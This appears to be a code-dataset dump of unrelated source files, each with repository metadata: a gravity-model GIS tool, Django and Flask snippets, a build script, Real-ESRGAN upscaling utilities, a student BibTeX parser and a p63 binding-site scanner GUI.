REPORT_TEMPLATE = u'''Interaction gravity modelling analysis
Input interactions: %s
Interaction selection query: %s
Origin mass field (m1): %s
Destination mass field (m2): %s
Interaction real strength field: %s
Interaction length field (d): %s
Output model strength field: %s
Optimization method used: %s
Interactions found: %i
Using gravity model in form G*m1*m2*d^(-B)
MODEL OUTPUT
Calculated parameters calibrated on real interactions
B parameter value: %g
G parameter value: %g
STATISTICAL ANALYSIS
'''
with common.runtool(9) as parameters:
interactions, selQuery, massFromFld, massToFld, interactFld, lengthFld, optimizationMethod, outputFld, reportFileName = parameters
## ASSEMBLE INPUT
common.progress('counting interactions')
count = common.count(interactions)
if count == 0:
raise ValueError, 'no interactions found'
common.message('Found ' + str(count) + ' interactions.')
common.progress('loading interactions')
modelInters = loaders.BasicReader(interactions, {'strength' : interactFld, 'distance' : lengthFld, 'massFrom' : massFromFld, 'massTo' : massToFld}, targetClass=modeling.GravityInteraction, where=selQuery).read()
# rows = arcpy.SearchCursor(interactions, selQuery)
# modelInters = []
# for row in rows:
# try:
# modelInters.append(GravityInteraction(row.getValue(interactFld), row.getValue(lengthFld), row.getValue(massFromFld), row.getValue(massToFld)))
# except ValueError:
# pass # neplatna interakce
## OPTIMALIZE
common.progress('creating gravity model')
opt = modeling.GravityOptimizer(modelInters)
common.progress('optimizing model parameters')
opt.optimize(optimizationMethod)
common.message('Model parameters found:')
common.message('B parameter value: ' + str(opt.getB()))
common.message('G parameter value: ' + str(opt.getG()))
common.progress('calculating model interactions')
modelStrengths = opt.theoreticalInteractions()
common.progress('calculating residuals')
report = opt.report(modelStrengths)
common.message('\nStatistical report\n\n' + report)
common.progress('saving model interactions')
loaders.SequentialUpdater(interactions, {'s' : outputFld}, where=selQuery).update([{'s' : st} for st in modelStrengths])
# rows = arcpy.UpdateCursor(interactions, selQuery)
# i = 0
# for row in rows:
# row.setValue(outputFld, modelStrengths[i])
# rows.updateRow(row)
# i += 1
if reportFileName:
common.progress('creating report')
out = (REPORT_TEMPLATE % (interactions, selQuery, massFromFld, massToFld, interactFld, lengthFld, outputFld, optimizationMethod, count, opt.getB(), opt.getG())) + report
opt.writeReport(out, reportFileName)
| [
"[email protected]"
] | |
59dc9eb4875328342d35aa350be38f2fd480157f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02988/s646336284.py | b26f4503b3a987d425115b8af58ec10880ae0e19 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | n = int(input())
P = [int(i) for i in input().split()]
ans = 0
for i in range(1, n-1):
if P[i-1] < P[i] < P[i+1]:
ans += 1
elif P[i-1] > P[i] > P[i+1]:
ans += 1
print(ans) | [
"[email protected]"
] | |
3b3ca2bace9cc78bd6f70523ff06faf3a1e3b10e | 8d1264d9257eba418f92dbbbc8aac6773c4ec715 | /core/signals/handlers.py | fe560bf24bf5e2578f83b7ab830653fd8a1cdd46 | [
"MIT"
] | permissive | aldwyn/effigia | 5f3e9e37eb7d169983034b61c7455baedc2d8817 | eb456656949bf68934530bbec9c15ebc6d0236b8 | refs/heads/main | 2023-02-18T00:09:53.905711 | 2021-06-10T22:04:51 | 2021-06-10T22:04:51 | 96,387,903 | 1 | 1 | MIT | 2023-02-15T20:04:00 | 2017-07-06T04:21:09 | HTML | UTF-8 | Python | false | false | 1,259 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import factory
from django.contrib.auth import get_user_model
from django.core.files.base import ContentFile
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.utils.text import slugify
from core.models import Category
from apps.accounts.models import UserProfile
from apps.galleries.models import Gallery
@receiver(post_save, sender=get_user_model())
def user_created(sender, instance, created, **kwargs):
if created and not instance.is_superuser:
UserProfile.objects.create(user=instance)
Gallery.objects.create(
name='Default',
is_default=True,
slug=slugify('default-gallery-by-%s' % instance),
created_by=instance,
description=('This is the gallery intended for your default portfolio storage. '
'Upload portfolios here to familiarize how Effigia galleries work.'),
category=Category.objects.get(name='Uncategorized'),
cover_image=ContentFile(
factory.django.ImageField()._make_data(
{'width': 1024, 'height': 768}
), 'default-gallery-cover.jpg'
))
| [
"[email protected]"
] | |
69758bba6726950a002212f930181c065e9e2d13 | 175e4e031471e5cdbc9bcaee2df10f5ec44871d3 | /LESSON2b/.history/test/webapitest/app_20200606195359.py | 714e72278231784e6b0e68430eaf0ccb9e8fd6b3 | [] | no_license | hiyacins/uma_study | c329d29a9c3899ab4feca21b9c47ef546b69b0bd | 067e66f258a0c89f7670c645dd7c40feee8536fa | refs/heads/master | 2023-01-23T06:40:12.435047 | 2020-06-17T15:59:34 | 2020-06-17T15:59:34 | 239,077,726 | 0 | 0 | null | 2023-01-06T08:36:26 | 2020-02-08T05:56:52 | Python | UTF-8 | Python | false | false | 714 | py | from flask import Flask, jsonify, request
import json
app = Flask(__name__)
number = []
# クライアント側からPostされてくる
@app.route('/incomes')
def get_incomes():
return jsonify(number)
# postされてきた情報を追加する。No Contentの場合のみ返す。
@app.route('/incomes', methods=['POST'])
def add_income():
number.append(request.get_json())
return '', 204
# jsonで取得したデータのvalueを足し算してクライアントに返す。
@app.route('/')
def calc_income():
print("きたよ")
x = json.load(request.get_json())
print(x)
z = int(x[0]) + int(x[1])
print(z)
return jsonify(z)
if __name__ == '__main__':
app.run()
| [
"[email protected]"
] | |
d544c2e7c9d241f40063ad8f91244d2f6b777aee | e7e74b72d5367ad03adcf20b3220620baddcc113 | /gore/signals.py | d6cca88cbbe184fe91d588a1ddd42b337042da80 | [
"MIT"
] | permissive | akx/gentry | be044a51d0b4d3dd875e320c5ecc3c02c0bc249c | 5a550e34ced37f8f83a10001a3ef0b1480983781 | refs/heads/master | 2023-02-21T21:42:55.205987 | 2022-07-05T22:34:27 | 2022-07-21T11:46:46 | 98,209,171 | 4 | 1 | MIT | 2023-02-15T20:41:40 | 2017-07-24T16:02:32 | Python | UTF-8 | Python | false | false | 62 | py | from django.dispatch import Signal
event_received = Signal()
| [
"[email protected]"
] | |
779cddc46f1d979f1b14262ace1f13380aa72d7e | 88ae8695987ada722184307301e221e1ba3cc2fa | /native_client/tests/unittests/shared/platform/build.scons | bfeb276a5229c844b09fb3c0810f6fc5f369a80a | [
"BSD-3-Clause",
"Zlib",
"Classpath-exception-2.0",
"BSD-Source-Code",
"LZMA-exception",
"LicenseRef-scancode-unicode",
"LGPL-3.0-only",
"LGPL-2.0-or-later",
"LicenseRef-scancode-philippe-de-muyter",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-intel-osl-1993",
"HPND-sell-variant",
"ICU",
"LicenseRef-scancode-protobuf",
"bzip2-1.0.6",
"Spencer-94",
"NCSA",
"LicenseRef-scancode-nilsson-historical",
"CC0-1.0",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"LicenseRef-scancode-other-copyleft",
"GPL-2.0-or-later",
"NTP",
"GPL-2.0-only",
"LicenseRef-scancode-other-permissive",
"GPL-3.0-only",
"GFDL-1.1-only",
"W3C",
"LicenseRef-scancode-python-cwi",
"GCC-exception-3.1",
"BSL-1.0",
"Python-2.0",
"GPL-1.0-or-later",
"LGPL-2.1-or-later",
"LicenseRef-scancode-unknown-license-reference",
"CPL-1.0",
"GFDL-1.1-or-later",
"W3C-19980720",
"LGPL-2.0-only",
"LicenseRef-scancode-amd-historical",
"LicenseRef-scancode-ietf",
"SAX-PD",
"LicenseRef-scancode-x11-hanson",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"dtoa",
"MIT",
"LicenseRef-scancode-public-domain-disclaimer",
"PSF-2.0",
"LicenseRef-scancode-newlib-historical",
"LicenseRef-scancode-generic-exception",
"SMLNJ",
"HP-1986",
"LicenseRef-scancode-free-unknown",
"SunPro",
"MPL-1.1"
] | permissive | iridium-browser/iridium-browser | 71d9c5ff76e014e6900b825f67389ab0ccd01329 | 5ee297f53dc7f8e70183031cff62f37b0f19d25f | refs/heads/master | 2023-08-03T16:44:16.844552 | 2023-07-20T15:17:00 | 2023-07-23T16:09:30 | 220,016,632 | 341 | 40 | BSD-3-Clause | 2021-08-13T13:54:45 | 2019-11-06T14:32:31 | null | UTF-8 | Python | false | false | 959 | scons | # -*- python -*-
# Copyright 2008 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
Import('env')
nacl_thread_create_joinable_test_exe = env.ComponentProgram(
'nacl_thread_create_joinable_test',
'nacl_thread_create_joinable_test.c',
EXTRA_LIBS=['platform',
'gio'])
node = env.CommandTest(
'nacl_thread_create_joinable_test.out',
command=[nacl_thread_create_joinable_test_exe])
env.AddNodeToTestSuite(node,
['small_tests'],
'run_nacl_thread_create_joinable_test')
atomic_ops_test_exe = env.ComponentProgram(
'atomic_ops_test',
'atomic_ops_test.c',
EXTRA_LIBS=['platform', 'gio'])
node = env.CommandTest(
'atomic_ops_test.out',
command=[atomic_ops_test_exe, '25'],
size='medium')
env.AddNodeToTestSuite(node, ['medium_tests'], 'run_atomic_ops_test')
| [
"[email protected]"
] | |
1559621c54b1ff6ac69648ec2eb3bf4ef28bfa19 | c9a8bbc9068983d0fdeec0591baada54097199a9 | /realesrgan/utils.py | 06b2261df8e9a441ef8dea2fde9f321b133d6c5e | [
"BSD-3-Clause",
"Python-2.0"
] | permissive | BookerDeWitt/Real-ESRGAN | 041188784c8e1f842a443229643cb3065edc2272 | 5745599813f64c60b98048251ac421f199b4c034 | refs/heads/master | 2023-07-07T13:19:32.780848 | 2021-08-08T08:41:50 | 2021-08-08T08:41:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,470 | py | import cv2
import math
import numpy as np
import os
import torch
from basicsr.archs.rrdbnet_arch import RRDBNet
from torch.hub import download_url_to_file, get_dir
from torch.nn import functional as F
from urllib.parse import urlparse
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
class RealESRGANer():
def __init__(self, scale, model_path, tile=0, tile_pad=10, pre_pad=10, half=False):
self.scale = scale
self.tile_size = tile
self.tile_pad = tile_pad
self.pre_pad = pre_pad
self.mod_scale = None
self.half = half
# initialize model
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=scale)
if model_path.startswith('https://'):
model_path = load_file_from_url(
url=model_path, model_dir='realesrgan/weights', progress=True, file_name=None)
loadnet = torch.load(model_path)
if 'params_ema' in loadnet:
keyname = 'params_ema'
else:
keyname = 'params'
model.load_state_dict(loadnet[keyname], strict=True)
model.eval()
self.model = model.to(self.device)
if self.half:
self.model = self.model.half()
def pre_process(self, img):
img = torch.from_numpy(np.transpose(img, (2, 0, 1))).float()
self.img = img.unsqueeze(0).to(self.device)
if self.half:
self.img = self.img.half()
# pre_pad
if self.pre_pad != 0:
self.img = F.pad(self.img, (0, self.pre_pad, 0, self.pre_pad), 'reflect')
# mod pad
if self.scale == 2:
self.mod_scale = 2
elif self.scale == 1:
self.mod_scale = 4
if self.mod_scale is not None:
self.mod_pad_h, self.mod_pad_w = 0, 0
_, _, h, w = self.img.size()
if (h % self.mod_scale != 0):
self.mod_pad_h = (self.mod_scale - h % self.mod_scale)
if (w % self.mod_scale != 0):
self.mod_pad_w = (self.mod_scale - w % self.mod_scale)
self.img = F.pad(self.img, (0, self.mod_pad_w, 0, self.mod_pad_h), 'reflect')
def process(self):
try:
# inference
with torch.no_grad():
self.output = self.model(self.img)
except Exception as error:
print('Error', error)
def tile_process(self):
"""Modified from: https://github.com/ata4/esrgan-launcher
"""
batch, channel, height, width = self.img.shape
output_height = height * self.scale
output_width = width * self.scale
output_shape = (batch, channel, output_height, output_width)
# start with black image
self.output = self.img.new_zeros(output_shape)
tiles_x = math.ceil(width / self.tile_size)
tiles_y = math.ceil(height / self.tile_size)
# loop over all tiles
for y in range(tiles_y):
for x in range(tiles_x):
# extract tile from input image
ofs_x = x * self.tile_size
ofs_y = y * self.tile_size
# input tile area on total image
input_start_x = ofs_x
input_end_x = min(ofs_x + self.tile_size, width)
input_start_y = ofs_y
input_end_y = min(ofs_y + self.tile_size, height)
# input tile area on total image with padding
input_start_x_pad = max(input_start_x - self.tile_pad, 0)
input_end_x_pad = min(input_end_x + self.tile_pad, width)
input_start_y_pad = max(input_start_y - self.tile_pad, 0)
input_end_y_pad = min(input_end_y + self.tile_pad, height)
# input tile dimensions
input_tile_width = input_end_x - input_start_x
input_tile_height = input_end_y - input_start_y
tile_idx = y * tiles_x + x + 1
input_tile = self.img[:, :, input_start_y_pad:input_end_y_pad, input_start_x_pad:input_end_x_pad]
# upscale tile
try:
with torch.no_grad():
output_tile = self.model(input_tile)
except Exception as error:
print('Error', error)
print(f'\tTile {tile_idx}/{tiles_x * tiles_y}')
# output tile area on total image
output_start_x = input_start_x * self.scale
output_end_x = input_end_x * self.scale
output_start_y = input_start_y * self.scale
output_end_y = input_end_y * self.scale
# output tile area without padding
output_start_x_tile = (input_start_x - input_start_x_pad) * self.scale
output_end_x_tile = output_start_x_tile + input_tile_width * self.scale
output_start_y_tile = (input_start_y - input_start_y_pad) * self.scale
output_end_y_tile = output_start_y_tile + input_tile_height * self.scale
# put tile into output image
self.output[:, :, output_start_y:output_end_y,
output_start_x:output_end_x] = output_tile[:, :, output_start_y_tile:output_end_y_tile,
output_start_x_tile:output_end_x_tile]
def post_process(self):
# remove extra pad
if self.mod_scale is not None:
_, _, h, w = self.output.size()
self.output = self.output[:, :, 0:h - self.mod_pad_h * self.scale, 0:w - self.mod_pad_w * self.scale]
# remove prepad
if self.pre_pad != 0:
_, _, h, w = self.output.size()
self.output = self.output[:, :, 0:h - self.pre_pad * self.scale, 0:w - self.pre_pad * self.scale]
return self.output
def enhance(self, img, tile=False, alpha_upsampler='realesrgan'):
# img: numpy
img = img.astype(np.float32)
if np.max(img) > 255: # 16-bit image
max_range = 65535
print('\tInput is a 16-bit image')
else:
max_range = 255
img = img / max_range
if len(img.shape) == 2: # gray image
img_mode = 'L'
img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
elif img.shape[2] == 4: # RGBA image with alpha channel
img_mode = 'RGBA'
alpha = img[:, :, 3]
img = img[:, :, 0:3]
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if alpha_upsampler == 'realesrgan':
alpha = cv2.cvtColor(alpha, cv2.COLOR_GRAY2RGB)
else:
img_mode = 'RGB'
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# ------------------- process image (without the alpha channel) ------------------- #
self.pre_process(img)
if self.tile_size > 0:
self.tile_process()
else:
self.process()
output_img = self.post_process()
output_img = output_img.data.squeeze().float().cpu().clamp_(0, 1).numpy()
output_img = np.transpose(output_img[[2, 1, 0], :, :], (1, 2, 0))
if img_mode == 'L':
output_img = cv2.cvtColor(output_img, cv2.COLOR_BGR2GRAY)
# ------------------- process the alpha channel if necessary ------------------- #
if img_mode == 'RGBA':
if alpha_upsampler == 'realesrgan':
self.pre_process(alpha)
if self.tile_size > 0:
self.tile_process()
else:
self.process()
output_alpha = self.post_process()
output_alpha = output_alpha.data.squeeze().float().cpu().clamp_(0, 1).numpy()
output_alpha = np.transpose(output_alpha[[2, 1, 0], :, :], (1, 2, 0))
output_alpha = cv2.cvtColor(output_alpha, cv2.COLOR_BGR2GRAY)
else:
h, w = alpha.shape[0:2]
output_alpha = cv2.resize(alpha, (w * self.scale, h * self.scale), interpolation=cv2.INTER_LINEAR)
# merge the alpha channel
output_img = cv2.cvtColor(output_img, cv2.COLOR_BGR2BGRA)
output_img[:, :, 3] = output_alpha
# ------------------------------ return ------------------------------ #
if max_range == 65535: # 16-bit image
output = (output_img * 65535.0).round().astype(np.uint16)
else:
output = (output_img * 255.0).round().astype(np.uint8)
return output, img_mode
def load_file_from_url(url, model_dir=None, progress=True, file_name=None):
"""Ref:https://github.com/1adrianb/face-alignment/blob/master/face_alignment/utils.py
"""
if model_dir is None:
hub_dir = get_dir()
model_dir = os.path.join(hub_dir, 'checkpoints')
os.makedirs(os.path.join(ROOT_DIR, model_dir), exist_ok=True)
parts = urlparse(url)
filename = os.path.basename(parts.path)
if file_name is not None:
filename = file_name
cached_file = os.path.abspath(os.path.join(ROOT_DIR, model_dir, filename))
if not os.path.exists(cached_file):
print(f'Downloading: "{url}" to {cached_file}\n')
download_url_to_file(url, cached_file, hash_prefix=None, progress=progress)
return cached_file
| [
"[email protected]"
] | |
5d3905192683a5c50a7325311d5ace07612a462d | 14be8bcd7e66aad90b98d7c76a78fdb94c7c4f65 | /l06/class6.py | 7bbaa747c2aab0de8091ab7eb6f5675803a36373 | [] | no_license | alexbyz/HW070172 | f6231d7ccd0fb06a88db9bd6b0c718ed70ce62a2 | e0e4946f82ba71b4d3860c570fadb9cd96a6c9a1 | refs/heads/main | 2023-03-03T06:16:17.630740 | 2021-02-09T09:55:04 | 2021-02-09T09:55:04 | 305,626,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,304 | py | import regex
recordIdealtype = {
"recodType": "recordType",
"citationKey": "citationKey",
"title": "title",
"author": "author",
"date": "date",
"location": "location"
}
def readFile(): #reads in the file
infile = input("inputfile: ")
infile = open(infile, "r", encoding="UTF-8")
data ="" #string to read the file into
#for line in infile:
# data = data + line
date = infile.read()
return data
def getRecords(inString): #splits the long string along '\n@'
return inString.split("\n@")
def main():
data = readFile()
records = getRecords(data)
#for i in range(len(records)): #loops throug the records
for record in records[1:]:
input(record)
entry = records[i].split('\n')
print(entry)
firstEntry = entry[0].split('{')
recordType = firstEntry[0].strip()
citationKey = firstEntry[1].strip()
record["recodType"] = recordType
record["citationKey"] = citationKey
for x in range(1,len(entry)-1,1):
key, value = entry[x].split("=")
#print(key,"\t", value)
if key.strip() in recordIdealtype:
record[key] = value
print(record)
main() | [
"[email protected]"
] | |
054f36bcdf826e08a8f89aaa7f004b02e8e37953 | 5bb2bfb2b15d2fd1c481181e028445da9c999d4a | /scripts/p63scan_gui.py | ba238ab6d96117f0882f83b287f5a4ff7f570947 | [
"MIT"
] | permissive | Cesibarcaroli/p53scan | a482fe7a126b52468212f81834b30645af3d50d2 | d73230e108db36fbcb7bb478f0622fe10cddd9df | refs/heads/master | 2021-01-21T20:06:50.508594 | 2017-05-15T11:14:14 | 2017-05-15T11:14:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,315 | py | #!/usr/bin/env python
import sys
import string
import os
from Tkinter import *
import tkFileDialog
import tkSimpleDialog
import tkMessageBox
from PftScan.Fasta import Fasta
from PftScan.core import scan
# Constants
NAME = "p63scan"
VERSION = "1.05"
DESCRIPTION = """%s - Version %s
p63scan (http://www.ncmls.nl/bioinfo/p53scan/) is an algorithm to locate
p63 binding sites in DNA sequences. It is described in:
Smeenk L, van Heeringen SJ, Koeppel M, Driel MA, Bartels SJ, Akkers RC,
Denissov S, Stunnenberg HG, Lohrum M. Characterization of genome-wide
p53-binding sites upon stress response. Nucleic Acids Res. (2008) """ % (NAME, VERSION)
# Constants determining default values for p63scan
DEFAULT_MIN_SPACER = 0
DEFAULT_MAX_SPACER = 0
DEFAULT_NREPORT = 1
DEFAULT_CUTOFFS = [4.737]
PWM_LEFT = [
[0.282487110278,0.0977411337588,0.374860098537,0.244911657426],
[0.406620302733,0.0295237937609,0.440169814207,0.123686089299],
[2.23663409829e-07,0.968910115044,0.00626279913863,0.0248268621545],
[0.692909467314,0.116752523594,0.0733618220874,0.116976187004],
[0.296354241687,0.0185642866792,0.150973025298,0.534108446336],
[2.23663409829e-07,2.23663409829e-07,0.99999932901,2.23663409829e-07],
[0.103332719005,0.382911981291,0.00559180890914,0.508163490795],
[0.164392829888,0.439498823978,0.0883472705459,0.307761075588],
[0.160814215331,0.333258704309,0.202191946149,0.303735134211]
]
PWM_RIGHT = [
[0.309550382867,0.199731648641,0.329009099522,0.16170886897],
[0.307761075588,0.0885709339558,0.443748428765,0.159919561691],
[0.511742105353,0.00671012595829,0.380675347193,0.100872421496],
[2.23663409829e-07,0.99999932901,2.23663409829e-07,2.23663409829e-07],
[0.532990129286,0.151420352118,0.0172223062203,0.298367212376],
[0.116081533365,0.0740328123169,0.115857869955,0.694027784363],
[0.0259451792036,0.00648646254846,0.967568134585,2.23663409829e-07],
[0.123909752709,0.43659119965,0.029300130351,0.41019891729],
[0.237307101492,0.379109703324,0.0975174703489,0.286065724835],
[0.199284321821,0.302840480572,0.158801244642,0.339073952964]
]
class ScanDialog(tkSimpleDialog.Dialog):
def switch_default(self):
if self.default_switches[0]['state'] == DISABLED:
for entry in self.default_switches:
entry['state'] = NORMAL
if self.r.get() == 3:
self.cutoff_entry['state'] = NORMAL
else:
for entry in self.default_switches + self.entries:
entry['state'] = DISABLED
def cutoff_default(self):
self.cutoff_entry['state'] = NORMAL
self.cutoff_entry.delete(0,END)
self.cutoff_entry.insert(END, "Default")
self.cutoff_entry['state'] = DISABLED
def cutoff_none(self):
self.cutoff_entry['state'] = NORMAL
self.cutoff_entry.delete(0,END)
self.cutoff_entry.insert(END, "None")
self.cutoff_entry['state'] = DISABLED
def cutoff_on(self):
self.cutoff_entry['state'] = NORMAL
self.cutoff_entry.delete(0,END)
self.cutoff_entry.insert(END, "0")
def body(self, master):
self.scan_ok = False
boxes = [
("Minspacer:", 0, DEFAULT_MIN_SPACER, True),
("Maxspacer:", 1, DEFAULT_MAX_SPACER, True),
("Numreport:", 2, DEFAULT_NREPORT, True),
("Score cutoff:", 4, "Default", False),
]
self.entries = []
self.default_switches = []
for (label, r, val, ds) in boxes:
Label(master, text=label).grid(row=r)
entry = Entry(master)
entry.grid(row=r, column=1, columnspan=3, sticky=W)
entry.insert(END, val)
self.entries.append(entry)
if ds:
self.default_switches.append(entry)
self.cutoff_entry = self.entries[-1]
Label(master).grid(row=3)
Label(master).grid(row=6)
self.r = IntVar()
self.r.set(1)
for (label, v, col, function) in [("Default", 1, 0, self.cutoff_default), ("None", 2, 1, self.cutoff_none),("Cutoff", 3, 2, self.cutoff_on)]:
r = Radiobutton(master, text=label, variable=self.r, value=v, command=function)
r.grid(row=5, column=col, sticky=W)
self.default_switches.append(r)
for entry in self.entries + self.default_switches:
entry["state"] = DISABLED
self.cb = Checkbutton(master, text="Default Settings", command=self.switch_default)
self.cb.grid(row=7, columnspan=4, sticky=W)
self.cb.select()
return self.cb # initial focus
def apply(self):
pass
def validate(self):
try:
self.scan_ok = True
self.min_spacer = string.atoi(self.entries[0].get())
self.max_spacer = string.atoi(self.entries[1].get())
self.nreport = string.atoi(self.entries[2].get())
self.defaults = True
self.cutoff = None
if self.r.get() > 1:
self.defaults = False
if self.r.get() == 3:
self.cutoff = string.atof(self.entries[3].get())
return 1
except:
tkMessageBox.showwarning("Bad input", "Illegal values, please try again")
return 0
class MultiListbox(Frame):
# MultiListbox Tkinter widget code by Brent Burley
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52266
# SortableTable widget additions by Rick Lawson
# http://tkinter.unpythonic.net/wiki/SortableTable
def __init__(self, master, lists):
Frame.__init__(self, master)
self.lists = []
self.colmapping={}
self.origData = None
for l,w in lists:
frame = Frame(self); frame.pack(side=LEFT, expand=YES, fill=BOTH)
b = Button(frame, text=l, borderwidth=1, relief=RAISED)
b.pack(fill=X)
b.bind('<Button-1>', self._sort)
self.colmapping[b]=(len(self.lists),1)
lb = Listbox(frame, width=w, borderwidth=0, selectborderwidth=0,
relief=FLAT, exportselection=FALSE)
lb.pack(expand=YES, fill=BOTH)
self.lists.append(lb)
lb.bind('<B1-Motion>', lambda e, s=self: s._select(e.y))
lb.bind('<Button-1>', lambda e, s=self: s._select(e.y))
lb.bind('<Leave>', lambda e: 'break')
lb.bind('<B2-Motion>', lambda e, s=self: s._b2motion(e.x, e.y))
lb.bind('<Button-2>', lambda e, s=self: s._button2(e.x, e.y))
frame = Frame(self); frame.pack(side=LEFT, fill=Y)
Label(frame, borderwidth=1, relief=RAISED).pack(fill=X)
sb = Scrollbar(frame, orient=VERTICAL, command=self._scroll)
sb.pack(expand=YES, fill=Y)
self.lists[0]['yscrollcommand']=sb.set
def _select(self, y):
row = self.lists[0].nearest(y)
self.selection_clear(0, END)
self.selection_set(row)
return 'break'
def _button2(self, x, y):
for l in self.lists: l.scan_mark(x, y)
return 'break'
def _b2motion(self, x, y):
for l in self.lists: l.scan_dragto(x, y)
return 'break'
def _scroll(self, *args):
for l in self.lists:
apply(l.yview, args)
def curselection(self):
return self.lists[0].curselection()
def delete(self, first, last=None):
for l in self.lists:
l.delete(first, last)
def get(self, first, last=None):
result = []
for l in self.lists:
result.append(l.get(first,last))
if last:
if last - first == 0:
return [result]
else:
return apply(map, [None] + result)
return [result]
def index(self, index):
self.lists[0].index(index)
def insert(self, index, *elements):
for e in elements:
i = 0
for l in self.lists:
l.insert(index, e[i])
i = i + 1
def size(self):
return self.lists[0].size()
def see(self, index):
for l in self.lists:
l.see(index)
def selection_anchor(self, index):
for l in self.lists:
l.selection_anchor(index)
def selection_clear(self, first, last=None):
for l in self.lists:
l.selection_clear(first, last)
def selection_includes(self, index):
return self.lists[0].selection_includes(index)
def selection_set(self, first, last=None):
for l in self.lists:
l.selection_set(first, last)
def _sort(self, e):
# get the listbox to sort by (mapped by the header button)
b=e.widget
col, direction = self.colmapping[b]
# get the entire table data into mem
tableData = self.get(0,END)
if self.origData == None:
import copy
self.origData = copy.deepcopy(tableData)
rowcount = len(tableData)
#remove old sort indicators if it exists
for btn in self.colmapping.keys():
lab = btn.cget('text')
if lab[0]=='[': btn.config(text=lab[4:])
btnLabel = b.cget('text')
#sort data based on direction
if direction==0:
tableData = self.origData
else:
if direction==1: b.config(text='[+] ' + btnLabel)
else: b.config(text='[-] ' + btnLabel)
# sort by col
def colsort(x, y, mycol=col, direction=direction):
return direction*cmp(x[mycol], y[mycol])
tableData.sort(colsort)
#clear widget
self.delete(0,END)
# refill widget
for row in range(rowcount):
self.insert(END, tableData[row])
# toggle direction flag
if(direction==1): direction=-1
else: direction += 1
self.colmapping[b] = (col, direction)
class StatusBar(Frame):
def __init__(self, master):
Frame.__init__(self, master)
self.label = Label(self, bd=1, relief=SUNKEN, anchor=W)
self.label.pack(fill=X)
def set(self, format, *args):
self.label.config(text=format % args)
self.label.update_idletasks()
def clear(self):
self.label.config(text="")
self.label.update_idletasks()
class App:
def open_fasta_file(self):
name = tkFileDialog.askopenfilename()
if name:
try:
self.f = Fasta(name)
self.loaded_file = os.path.split(name)[-1]
self.mlb.delete(0, self.mlb.size() - 1)
self.status.set("Loaded %s - %s" % (self.loaded_file, self.f))
self.scanmenu.entryconfig(0, state=NORMAL)
except:
tkMessageBox.showerror("Error opening file", "Error opening %s.\nIs it a valid FASTA file?" % os.path.split(name)[-1])
def save_results(self):
name = tkFileDialog.asksaveasfilename(filetypes=[("gff", "*.gff")], defaultextension=".gff")
if name:
f = open(name, "w")
for row in self.mlb.get(0, self.mlb.size() - 1):
f.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s %s %s\n" % (row[0], "p63scan", "p63bs", row[1], row[2], row[3], "+", ".", row[4], row[5], row[6]))
f.close()
self.status.set("p63scan results written to %s" % os.path.split(name)[-1])
def scan_file(self):
d = ScanDialog(self.master)
if d.scan_ok:
min_spacer = d.min_spacer
max_spacer = d.max_spacer
nreport = d.nreport
cutoffs = []
if d.defaults:
cutoffs = DEFAULT_CUTOFFS
elif d.cutoff:
cutoffs = (max_spacer - min_spacer + 1) * [d.cutoff]
d.destroy()
self.status.set("Scanning %s for p63 binding sites" % self.loaded_file)
self.mlb.delete(0, self.mlb.size() - 1)
count = 0
for (id,seq) in self.f.items():
result = scan(seq.upper(), PWM_LEFT, PWM_RIGHT, min_spacer, max_spacer, cutoffs, nreport)
for (score, pos, spacer, strand) in result:
count += 1
self.mlb.insert(END,(id, pos, pos + len(PWM_LEFT) + spacer + len(PWM_RIGHT), score,
seq[pos: pos + len(PWM_LEFT)],
seq[pos + len(PWM_LEFT): pos + len(PWM_LEFT) + spacer],
seq[pos + len(PWM_LEFT) + spacer: pos + len(PWM_LEFT) + spacer + len(PWM_RIGHT)]
))
self.status.set("Done scanning %s. Found %s binding sites." % (self.loaded_file, count))
self.filemenu.entryconfig(1, state=NORMAL)
def exit(self):
sys.exit()
def resize(self, event):
frame.pack()
def about(self):
tkMessageBox.showinfo("About %s" % NAME, DESCRIPTION)
def __init__(self, master):
# create a menu
self.master = master
master.title("p63scan")
menu = Menu(master)
master.config(menu=menu)
self.filemenu = Menu(menu,tearoff=0)
menu.add_cascade(label="File", menu=self.filemenu)
self.filemenu.add_command(label="Open Fastafile...", command=self.open_fasta_file)
self.filemenu.add_command(label="Save Results...", command=self.save_results)
self.filemenu.add_separator()
self.filemenu.add_command(label="Exit", command=self.exit)
self.filemenu.entryconfig(1, state=DISABLED)
self.scanmenu = Menu(menu,tearoff=0)
menu.add_cascade(label="Scan", menu=self.scanmenu)
self.scanmenu.add_command(label="Scan file", command=self.scan_file)
self.scanmenu.entryconfig(1, state=DISABLED)
helpmenu = Menu(menu,tearoff=0)
menu.add_cascade(label="Help", menu=helpmenu)
helpmenu.add_command(label="About...", command=self.about)
self.status = StatusBar(master)
self.status.pack(side=BOTTOM, fill=X)
self.status.set("No file loaded")
self.mlb = MultiListbox(master, (('id', 30), ('start', 4),('end',4), ('score', 4), ('left', 15), ('spacer', 10), ('right', 15)))
self.mlb.pack(expand=YES, fill=BOTH)
root = Tk()
